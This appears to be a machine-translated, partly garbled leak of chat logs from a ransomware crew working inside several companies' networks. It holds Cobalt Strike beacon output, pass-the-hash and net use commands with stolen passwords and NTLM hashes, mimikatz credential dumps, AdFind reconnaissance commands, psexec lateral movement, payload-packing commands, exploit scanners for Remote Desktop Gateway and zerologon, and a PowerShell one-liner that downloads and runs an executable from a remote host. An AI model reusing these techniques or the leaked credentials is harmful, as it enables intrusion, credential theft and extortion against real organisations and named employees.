49544 49680 conhost.exe x64 0 NT AUTHORITY\SYSTEM *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM 49240 632 TMBMSRV.exe x64 0 NT AUTHORITY\SYSTEM 49976 632 TmCCSF.exe x64 0 NT AUTHORITY\SYSTEM 57936 49976 TmsaInstance64.exe x64 0 NT AUTHORITY\SYSTEM 53368 57936 conhost.exe x64 0 NT AUTHORITY\SYSTEM 142872 632 LogMeIn.exe x64 0 NT AUTHORITY\SYSTEM 176516 632 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM 184868 632 WmiApSrv.exe x64 0 NT AUTHORITY\SYSTEM 640 540 lsass.exe x64 0 NT AUTHORITY\SYSTEM 4228 8148 zscccon64.exe x64 0 NT AUTHORITY\SYSTEM 8988 4228 conhost.exe x64 0 NT AUTHORITY\SYSTEM 4364 1720 winlogon.exe x64 2 NT AUTHORITY\SYSTEM 3228 4364 dwm.exe x64 2 Window Manager\DWM-2 160248 4364 logonUI.exe x64 2 NT AUTHORITY\SYSTEM 4448 7868 conhost.exe x64 0 SKYTECH1\bbesadmin 4796 1720 csrss.exe x64 2 NT AUTHORITY\SYSTEM 6840 7056 jusched.exe x86 2 
SKYTECH1\skyadmin 1044 6840 jucheck.exe x86 2 SKYTECH1\skyadmin 6924 9964 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM 8620 5452 explorer.exe x64 2 SKYTECH1\skyadmin 5856 8620 vmtoolsd.exe x64 2 SKYTECH1\skyadmin 142068 8620 LogMeInSystray.exe x64 2 SKYTECH1\skyadmin 9340 9964 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM 10152 7868 schtasks.exe x64 0 SKYTECH1\bbesadmin 49532 49328 PccNtMon.exe x64 2 SKYTECH1\skyadmin 184316 180296 platform-installation-manager.exe x86 0 NT AUTHORITY\SYSTEM 220380 220652 powershell.exe x64 0 NT AUTHORITY\SYSTEM 217240 220380 conhost.exe x64 0 NT AUTHORITY\SYSTEM 220744 220380 powershell.exe x86 0 NT AUTHORITY\SYSTEM 219488 220744 conhost.exe x64 0 NT AUTHORITY\SYSTEM ``I don't see what's in the processes except for avera, is it just on the population or nowhere at all? ``` 01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, but the file udmi does not show up) but there are extensions who will stay7 on Mon by 5 the rest go home1 on duty a lot are already encrypted on the nasa? the wiped is still being tossed with terabytes of files all passed? did the other prima linas pass? 
Servers:
- hell: 39
- alive: 15
- drawn: 15
- coded: 15

Armies:
- by hell: 184
- alive: 48
- encrypted: 48 (primaed)

all disks unshared, processes nailed down

```
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas
```

```
pth skytech1.local\BESAdmin b7e996a9282b045b181ab26ba27f6242
```

```
10.0.2.130
10.0.6.9
10.0.6.27
10.0.2.7
10.0.6.51
10.0.6.13
```

S(FJH*G&*SDifgtsidgtis7g ?600 then in slipslip so it's already in nemya in winlogon dk I always throw in slipslip just open winlogon how many? on one, get it then on dk) all in group dk 1 and in slipslip sessions on a couple of servers fuck them

```
beacon> shell ping gaudyme.com
[*] Tasked beacon to run: ping gaudyme.com
[+] host called home, sent: 47 bytes
[+] received output:

Pinging gaudyme.com [72.52.147.20] with 32 bytes of data:
Reply from 72.52.147.20: bytes=32 time=85ms TTL=55
Reply from 72.52.147.20: bytes=32 time=84ms TTL=55
Reply from 72.52.147.20: bytes=32 time=84ms TTL=55
Reply from 72.52.147.20: bytes=32 time=85ms TTL=55

Ping statistics for 72.52.147.20:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 84ms, Maximum = 85ms, Average = 84ms

beacon> portscan 72.52.147.20 1-30,135,139,443,445
[*] Tasked beacon to scan ports 1-30,135,139,443,445 on 72.52.147.20
[+] host called home, sent: 93285 bytes
[+] received output:
(ICMP) Target '72.52.147.20' is alive.
```
```
[read 8 bytes] 72.52.147.20:443 72.52.147.20:26 72.52.147.20:21 (220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------)
[+] received output: 72.52.147.20:25
[+] received output: Scanner module is complete
```
Simply, there seem to be users and a real domain, realproscan. 3 servers, one destination unreachable, the other redirects to the current one. dk why.
90% it's not a laba. 1-30,135,139,443, as we fucked the brain, and not a laba.
A laba can take an existing domain of some company, but you can not go directly to this domain. You know, they sell clothes, they have pages in Insta and Facebook, so we are talking about this) and that's not to say that a laba does not look like a laba. I just say there is quarantine mostly.
Look, wilsonart, 30 trusts? https://shopthegaudy.com/ well, however? There are about 30 trusts there, but the neighboring one is definitely not a laba.
So you know how we know how to shine the inventory for analytics labs?)
yes, let's close it)
yes, I also think it looks like a laba again... 3 servers, let's close it, no trusts, throw it on the server far away.
```
32 Objects returned
```
I'll give you dllkrasawa,
```
[DC] 'DressinGaudy.local' will be the domain
[DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server
[DC] Exporting domain 'DressinGaudy.local'
```
SharpShares didn't give out the balloon, let ShareFinder.
kerbs no)
I just noticed, and let's drop them in the process.
kerbs? shufflefinder? no.
elevate has worked out. the current username is a domain user, but here domain users are LA.
```
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
Administrator  bdc  canton  corporate  DG102  DG105  DG108  GCPOS10A-TGM3  GCPOS11A-CDG1  GCPOS12A-CDG2  GCPOS13A-CDG3  GCPOS17A-LDG1  GCPOS18A-LDG2  GCPOS1A-TDG1  GCPOS2A-TDG2  GCPOS3A-LGM1  GCPOS4A-LGM2  GCPOS5A-LGM3  GCPOS6A-TXDG1  GCPOS7A-TXDG2  GCPOS8A-TGM1  GCPOS9A-TGM2  GM103  GM106  jmr  katelync  kimw  ROOK  tim
The command completed successfully.
```
```
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
```
```
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator  DGW-PC  DRESSINGAUDY\Domain Admins  DRESSINGAUDY\Domain Users
The command completed successfully.
```
ah, ok. I respawn. in the input there is, yes, in the cob it falls off for me. I will restart then.
don't refresh it, overall not critical.
request ad_ous or ad_group - the session falls off.
today they will be new. not gonna waste more time.
ok, fuck it, maybe they have off-line backups or something. the backups server is not open. 10 servers checked, there's no note, i'll help you in STAKC.
i still have everything patched (tell @user3 and @user9 they did a good job)
If you want to use zerologon, what tactic/sequence of action would you advise?
I'm just not that familiar with openssl, so I thought maybe you've caught a similar thing before and know how to fix it... As I understand it, a bug in Ubuntu seems to be the same error?
```
proxychains python3 RDGScanner.py 172.31.190.10 3391
proxychains python3 rdg_scanner_cve-2020-0609.py 172.31.190.10
proxychains python3 BlueGate.py 172.31.190.10 -M check
```
How do you run it and what do you run?
```
df734@vps:~$ pip3 freeze
certifi==2019.11.28
cffi==1.14.3
chardet==3.0.4
cryptography==2.8
idna==2.8
netaddr==0.8.0
pycparser==2.20
pyOpenSSL==19.0.0
requests==2.22.0
six==1.14.0
urllib3==1.25.8
```
https://www.pyopenssl.org/en/stable/install.html
```
python3-openssl is already the newest version (19.0.0-1build1).
```
```
sudo apt install pyOpenSSL
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package pyOpenSSL
```
Did you install this? And the error is the same everywhere, in the same place.
```
[system_default_sect]
MinProtocol = SSLv3
CipherString = DEFAULT@SECLEVEL=1
```
Which one?
https://github.com/ollypwn/BlueGate
https://github.com/MalwareTech/RDGScanner
https://github.com/2d4d/rdg_scanner_cve-2020-0609
give me the link to the script used
no, didn't use.
```
Traceback (most recent call last):
  File "BlueGate.py", line 130, in <module>
    connection = Connection(args.host, args.port)
  File "BlueGate.py", line 68, in __init__
    self.connect()
  File "BlueGate.py", line 84, in connect
    self.connection.do_handshake()
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1915, in do_handshake
    self._raise_ssl_error(self._ssl, result)
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1647, in _raise_ssl_error
    _raise_current_error()
  File "/usr/lib/python3/dist-packages/OpenSSL/_util.py", line 54, in exception_from_error_queue
    raise exception_type(errors)
OpenSSL.SSL.Error: [('SSL routines', 'state_machine', 'internal error')]
df734@vps:~$
```
@tl1 Did you use CVE-2020-0609 yourself? Catching ssl errors. How to fix it?
Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability. Is it bleedingghost, which?
Okay, look at it. CVE-2020-0609, there is no way out from here.
What's wrong with it?
i will try zerologon. not one of them is pinged. i will check. you have them available?
yes. AD trusts? take it off and throw it here. by the way, i understand you did not take off AD, so you can, from the current domain through trust, take off the kerbs of other domains....
like AD trust domains? there - where? how do i go there?
i have an idea, no. have you removed kerbs from trusts? there are 4 in the file. two in quarantine.
no trusts?
well, there are more and not sure?
I will try zerologon tomorrow. Tomorrow I will try to start zerologon - no more options left...
```
beacon> portscan 172.31.190.47 80,443,25,110,995,143,993,465 icmp 10
[*] Tasked beacon to scan ports 80,443,25,110,995,143,993,465 on 172.31.190.47
[+] host called home, sent: 93245 bytes
[+] received output:

[+] received output:
Scanner module is complete
```
Check the web ports and the ports of the mail service, for example.
```
>operatingSystem: Windows Server 2003
>operatingSystemVersion: 5.2 (3790)
>operatingSystemServicePack: Service Pack 2
>dNSHostName: DETADP01.gpj.loc
```
on specific hosts, operating systems which you have in your AD, are they even registered? if they are empty - then the rest of the domain can already be scanned. if there is "empty" then sevens and 2008 under ms17-010. first choose an XP / 2003 machine.
terrible selection criteria)))
this will be most effective given that the other main paths we have tried)
I propose to ping all live hosts in the domain and go to this sploit with ALL of them, already with the creds of the domain user, to see if it is not connected to the IPC$ tree. you only need to include verbose.
and on what principle were these hosts selected? so here, like, nothing has scanned... no answers, no.... and what was the output, if i could see which ones you randomly scanned?
just because we have domain creds - with them it is better to "start" on some OSes above 7. were not the machines in the domain vulnerable to this exploit? and what about 17-010 at the end?
yes, at the end we only have her pass - but it does not roll anywhere as an administrator, right?
```
[+] received output:
[+] Success! Username: SBolley. Password: thisduckingsucks!
[*] Completed.
```
What's the error?
```
ERROR: FindOne : Exception calling "FindOne" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:145 char:36
ERROR: +         $user = $search.FindOne <<<< ()
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : DotNetMethodException
ERROR:
ERROR: user : The variable '$user' cannot be retrieved because it has not been set.
ERROR:
ERROR: At line:146 char:22
ERROR: +         if ($user <<<<  -ne $null)
ERROR:     + CategoryInfo          : InvalidOperation: (user:Token) [], RuntimeException
ERROR:     + FullyQualifiedErrorId : VariableIsUndefined
```
interesting
```
[+] received output:
Parsing file: \\GPJ.LOC\sysvol\GPJ.LOC\policies\{20FA66DA-01F3-493D-A72B-23C077395633}\Machine\Preferences\Groups\Groups.xml
```
17-010 checked?
Gentlemen, how is it with the UAC bypass? still no UAC bypassed?
Better let it be like this:
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
ADAXES  AMoultonADM  bigfix  ELittleADM  JStriberADM  pwwDirAdmin  TMunsonADM
```
Lest we forget, I wrote in #general.
why don't you take everything off at once as a list? it reminds me 2 times.
#local admin
```
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator  GPJ\SBolley  GPJHelp
The command completed successfully.
```
local admins and enterprise?
This is easier than that.
```
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name     IP Address
 -----------     ----------
[+] received output:
 DETMSDC01       192.168.11.42
 LAXMSDC01       192.168.30.42
 BNGMSDC01       192.168.110.42
 SFOMSDC01       10.200.132.52
 DETMSDC02       192.168.11.43
 TOKMSDC01       192.168.90.6
 SHARMSDC01      10.220.136.40
 SYDMSDC01       192.168.101.42
 SNGMSDC01       192.168.241.42
 NYCMSDC01       10.201.36.42
 AUSMSDC01       192.168.221.42
 SFOAMSDC01      10.200.164.42
 DENMSDC01       10.200.196.42
 LONMSDC02       10.210.4.42
 BEIMSDC02       192.168.120.28
 SHAMSDC02       192.168.140.3
 BOSMSDC01       10.200.228.42
 HKGMSDC01       192.168.230.42
 STURMSDC01      192.168.61.42
 PLNMSDC02       10.200.4.42
 MELMSDC01       10.220.68.42
 SHARMSDC02      10.220.136.42
 STURMSDC10      192.168.66.42
 STURMSDC20      192.168.67.42
 ROCMSDC01       10.200.100.42
 SFO2MSDC03      10.200.132.42
 STUGMSDC10      192.168.71.18
```
This is all servers (filtered by `Domain Controllers`):
```
DETMSDC02 TOKMSDC01 SHARMSDC01 SYDMSDC01 SNGMSDC01 NYCMSDC01 AUSMSDC01 SFOAMSDC01 DENMSDC01 LONMSDC02 BEIMSDC02 SHAMSDC02 BOSMSDC01 HKGMSDC01 STURMSDC01 PLNMSDC02 MELMSDC01 SHARMSDC02 STURMSDC10 STURMSDC20 ROCMSDC01 SFO2MSDC03 STUGMSDC03 STUGMSDC10 LAXMSDC01
```
Are the local admins? The enterprise, dc and ad infos?
The domain admins:
```
ELittleADM JStriberADM AMoultonADM TMunsonADM bigfix ADAXES pwwDirAdmin
```
user7 user5 user2
No session, only ran it again and, as you wrote, inj will die right away or appear later. injected dll and exe.
qq the last server
```
beacon> shell ping francedc1
[*] Tasked beacon to run: ping francedc1
[+] host called home, sent: 45 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

beacon> shell ping francedc1.rtpco.local
[*] Tasked beacon to run: ping francedc1.rtpco.local
[+] host called home, sent: 57 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Reply from 10.4.0.19: Destination host unreachable.
[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 1, Lost = 3 (75% loss),
```
This is for @user7.
found 104....69480 pid. I say that there is one. I have all the ahk standing, there is one live session that needs to be locked, so check the ping.
- Check whether the registry entry was created with the beacon: `shell reg query HKCU\Environment`. to nasa cling to destroying.
```
on 10 armas: 0 file(s) copied.
of them: no 445:
MFGWIN10-1: 10.0.0.110
ENGINEERING-PC2: 10.1.4.205
RYAN-GT73VR: 10.1.4.164
SCCY-LT07: 10.0.0.26
SCCY-05: 10.0.0.59
SCCY-01: 10.0.0.76
SCCY-03: 10.0.0.57
on dir under YES - Access is denied.
SCCY-20: 10.1.4.221
DESKTOP-UMQJ809: 10.1.4.230
us:
SCCY-NAS: 10.1.4.175:445
balls: Approved_Documentation Engineering IPC$ Quality Tool_Room usbshare1
all except usbshare1 are masked
shell net use * \\10.1.4.175\usbshare1
The password is invalid for \\10.1.4.175\usbshare1.
```
```
shell net use * \\10.1.4.175\usbshare1 /user:SCCY\vdsadmin T@ng0D0wn!
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
```
```
Total AD servers: 5
Live Servers: 2
Pulled servers: 2
Total armies in AD: 134
Live armies: 28
Artems attracted: 18
```
Yeah, wait till 2 and then start giving it to you.
yeah, why not
```
cme smb 170.7.183.1 -u Administrator -p Csfixit3 --local-auth --lsa
```
to @tl2, can I ask? i can't figure out if it's the other one)
so it's not among them)
so did you check if it's alive?
```
Domain Controllers:

 Server Name     IP Address
 -----------     ----------
 DCWAS01         170.7.2.220
 TNWAS01         170.7.14.203
 FLWAS01         170.7.20.220
 UKWAS01         170.7.70.210
 FRWAS02         172.25.168.125
 DRWAS01         170.7.132.51
```
```
User name                    alexanm
Account active               No
```
```
User name                    binnsv
Account active               Yes
```
```
User name                    roeders
Account active               Yes
```
```
User name                    lucase
Account active               Yes
```
```
* Username : Administrator
* Domain   : WILSONART
* NTLM     : 2caf37093fda2e2d172732487707cd31
* Password : {}wallC2013
```
This was taken through CrackMapExec. Is this even ntlm?
found a live account?
.hhz, while we check it?
There sits, yes - 170.7.183.1
```
192.168.1.6:445 - Success: '.\whsetup:Csfixit3' Administrator
```
༼ つ ◕_◕ ༽つ
normally xp/7/10
```
WORKSTATION\Administrator:Csfixit3
```
Even an administrator without rights) it's already on all the machines where it did not pass. the server is not among them?
great). Pass from the admin account and vhsfixit3.
no) from the server?
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
adm-cavailj  adm-GrelleS  Administrator  alexanm  bmccm  fowlerh  lucase  moorer2  owensd  petersm2  polyreyadmin  roeders  solarwindsarm.svc  vyombmccm
```
why don't you like cisks? are they on win-server? and the rest are bypassed.
here, try.
here some cisks, like those previous ones with the admin ball. all bypassed?
on these ten tens try to get patched zero here?
the answer is no, it's not.
the answer is no, it's nothing.
```
Connecting to 10.102.71.35...
Starting PSEXESVC service on 10.102.71.35...
Connecting with PsExec service on 10.102.71.35...
Starting powershell.exe on 10.102.71.35...
PsExec could not start powershell.exe on 10.102.71.35:
```
Where have we been - yes, on all servers Symantec stands? tpsh?
with flags at startup it disappears. there moves zversky saymtek rub dll kuponjalma all so, and replace with a point that, your messages can delete themselves) delete the case. this last one with flags, with one minus, not rightly assembled:
```
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=payload.bin -keep -self
```
collect llvm here with keep and self. nova clean.
23.82.140.215 https://expoless.com
empty file. change the coba, does not work the same way as last time? but it does not work, i used to build with the llvm builder, without the flag, that's what is saved in the notes.
command: are you still using the coba cleaner? you build llvm with your hands? it's more convenient without it
```
./shellConcatination --source=shellStarter_x64.dll --target=x64.dll --addBin=payload.bin
```
that it disappears - did you collect with what flag?
```
Shares for 170.7.5.54:
[--- Listable Shares ---]
ADMIN$ C$ D$ NxT$ NxTDeve$ NxTPyqa$ NxTTest$

Shares for 170.7.5.58:
[--- Listable Shares ---]
ADMIN$ C$ D$ NxT$ NxTDeve$ NxTPyqa$ NxTTest$

Shares for 170.7.5.57:
[--- Listable Shares ---]
ADMIN$ C$ D$ NxT$ NxTDeve$ NxTPyqa$ NxTTest$
```
Yes, and the dll disappears in both cases. The service starts and the session does not work too?
`rundll32.exe C:\Windows\Temp\x64.dll,` why is it not separated by a comma?
in the tpsh? now pinging. can you see the external? in general, yes, let's check the server?
Symantec, what edr? what kind of OS? top session does not fly. start cobalt works?
```
beacon> remote-exec psexec 10.102.71.35 rundll32 C:\Windows\Temp\x64.dll entryPoint
[*] Tasked beacon to run 'rundll32 C:\Windows\Temp\x64.dll entryPoint' on 10.102.71.35 via Service Control Manager
[+] host called home, sent: 1805 bytes
[+] received output:
Started service 2aed3bf on 10.102.71.35
```
Hmmm, a psexec?
```
ERROR:
Description = The RPC server is unavailable.
```
Check osvmik is available.
```
Shares for 10.102.71.35:
[--- Listable Shares ---]
ADMIN$ C$

Shares for 10.102.70.83:
[--- Listable Shares ---]
ADMIN$ C$

Shares for 10.102.72.34:
[--- Listable Shares ---]
ADMIN$ C$
```
hyperion_Service waglobal2014
this is where we did it before... search from here `*HYPERION_ADMIN`
```
Global Group memberships     *Austin_PW_Group      *HYPERION_ADMIN
                             *Domain Users
```
I gave a list.
```
shell wmic /node:78186W7P os get osarchitecture
[*] Tasked beacon to run: wmic /node:78186W7P os get osarchitecture
[+] host called home, sent: 72 bytes
[+] received output:
Node - 78186W7P
ERROR:
Description = Access is denied.
```
and don't flub like this: `beacon> shell wmic /node:78186W7P os get osarchitecture`
170.7.5.11 a, well, you do it in front of me.
and the session under the token polzaka. day access to kobu d.
you mean to say that nothing shot?
yes, it took out all the balls, not even available)) fucking laugh if you're laughing. i `shell dir \\share\C$`, does not give anything at all, a? These balloons aren't opening.
Is this the domain controller? \\LWDA-DC.Wilsonart.com\ADMIN$ - Remote Admin 170.7.5.19 170.7.14.20469:1488 uy (@tl2 there are no kerbs from here yet? there's no one else to go to) more like this: and you know what this means?) right! adfind.exe -f "(objectcategory=person)" > ad_users.txt adfind.exe -f "objectcategory=computer" > ad_computers.txt adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt adfind.exe -f "(objectcategory=group)" > ad_group.txt adfind.exe -gcb -sc trustdmp > trustdmp.txt How is it "get the right hell info"? and kerbs get the right hell info a do you know what it means?)) fuck 30 trust administrations no da da @tl2 do not forget to download comps are downloaded found on the machine TightVNC but where the configs no idea throw the standard output of programs filez from different workstations and study the FS of workstations exactly nado search confignu means somewhere is some VPN where almost anyone can go ...look for "correct" link to login polya) lol creeds of users in the browsers more precisely that if there are pointers to Citrix it makes sense to check the creeds of users browsers It seems that machines with Citrix as provides stable access thin clients also live alternative to VPN Remote/Citrix/VPN something like that in AD there are pointers to VPN?
in users or cars we searched in neighboring computers - about 20-25 probably checked no signs of software found (in other cases, it makes sense to search for relevant processes or signs of installed software @user1 well, this is for "native" vpn as i understand? so, what about the config? do you have a session? how to promote? it does not work with Citrix? no sessions as i understand no? parsing is working with the network via kmd, trying to raise the rights without backconnect parsing is what? 1) dns tunneling 2) parsing WITHOUT EXTERNAL CONNECTION This is where the fun part starts. we have two options really do not (no))) now look whether there is no external at all? tried powershell command generated input - seems to run but no session they are swearing at something, and what I did not have time to understand һttp://gist.githubcom/ethack/110f7f46272447828352768e6cd1c4cb through downloadstring and iche easier to do so, or rather not from a file but from a buffer possible to make an intermediate input script which from a file will emulate keystrokes, did it when they had to without a buffer large lines to type manually = )))) there clipboard does not work - any ideas how? one of "chips" Citrix if the kmd is already running - it won't close even if the citrix session dies http://cobaltstrike.com/help-externalc2 then the session will stay alive and if the kmd opens the host is back :confused: Hello! :metal: hello everybody) I think something like `powershellexe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe") NOT via rdp` I wrote above startup of usual applications is logged simply, those which have already been marked as "current" plus if a user comes in at the time of the work and sees the new ones on his dashboard...
Well, in general there is no need)) and use those that are available, they "can" go up in the allowed applications should not make changes Passage to the webserver from the frontend, if it will be much later, it is a very vast topic and requires a fairly deep understanding of web technologies, well, at least when we are not talking about vulnerabilities wordpress blogs = ) This "basic" checklist for citrix escape https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/ Citrix is a thin client, but still it is webvpn which is almost always tied up https://sf.primeinc.com/vpn/index.html ziegd SuperbowlChamps20 call kmd = ) NOT through rdp na collective intelligence)) so, a practical task pohyalnaya, now namut... we do not have Good morning. Any live sessions for further practice? Good morning, Monday at what time? Send the code to the email 0.dead.snu.edu)) are there more networks? in the appendix is spinning endlessly under all users and from several dedicates web page does not open (check all hosts account if it is valid somewhere - try to crash on rdp
We should have taken the hash check off not yes. beacon> shell net use \\172.24.2.8\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed [*] Tasked beacon to run: net use \\172.24.2.8\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed [+] host called home, sent: 103 bytes [+] received output: System error 5 has occurred. Access is denied. But getting up would certainly be a good idea right now, imho. tomorrow if everything survives - krepaneu quietly and you can go to the inspection on any servachek you try there? on dc not over the e probably all in a slip?
zakruglyatsyaa me here does not want to fly session from there) only easier i will take tomorrow more vpns such dobii tomorrow while i have no current access a then get up sooner wrap up for today, here you and the entrance to another domain) but you have to get up now and go to the other side of the house) beacon> shell net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed [*] Tasked beacon to run: net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed [+] host called home, sent: 105 bytes [+] received output: The command completed successfully. in two domains admin GLOBALNET\joel.reed:MountainD3w! If there pdk not in azure - then you can) dsinkat?) do not) well hashdamnapat I will not pdknut I see hashes and kleer even see not 2008 so there pdk 12 server palets tired to moth))))) why are you so with me?
Logon Server : ADC03-PHX01 Logon Time : 11/3/2020 8:35:31 AM SID : S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 462032229 (00000001:1b8a0d65) Session : RemoteInteractive from 19 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/28/2020 1:54:05 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4281980067 (00000000:ff39d4a3) Session : RemoteInteractive from 18 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/23/2020 10:17:14 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4079058940 (00000000:f3217ffc) Session : Service from 0 User Name : g.boles Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/21/2020 6:31:26 AM SID : S-1-5-21-498103351-3997332795-3100871051-15102 msv : [00000003] Primary * Username : g.boles * Domain : GLOBALNET * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 [00010000] CredentialKeys * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 tspkg : wdigest : * Username : g.boles * Domain : GLOBALNET * Password : (null) kerberos : * Username : g.boles * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 3660849891 (00000000:da3422e3) Session : RemoteInteractive from 13 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/13/2020 8:51:02 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 3465255253 (00000000:ce8b9955) Session : Interactive from 14 User Name : DWM-14 Domain : Window Manager Logon Server : (null) Logon Time : 10/9/2020 1:34:11 PM SID : S-1-5-90-14 msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : 
GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : * Username : ADC03-PHX01$ * Domain : GLOBALNET * Password : (null) kerberos : * Username : ADC03-PHX01$ * Domain : globalnet.local * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5 ssp : credman : Authentication Id : 0 ; 3411885558 (00000000:cb5d3df6) Session : RemoteInteractive from 1 User Name : jehad.jamalalldeen Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/8/2020 3:00:26 PM SID : S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 504788382 (00000000:1e16759e) Session : RemoteInteractive from 7 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:56:26 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 116428327 (00000000:06f08e27) Session : RemoteInteractive from 4 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/14/2020 12:56:27 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1181016 (00000000:00120558) Session : RemoteInteractive from 2 User Name : sjose 
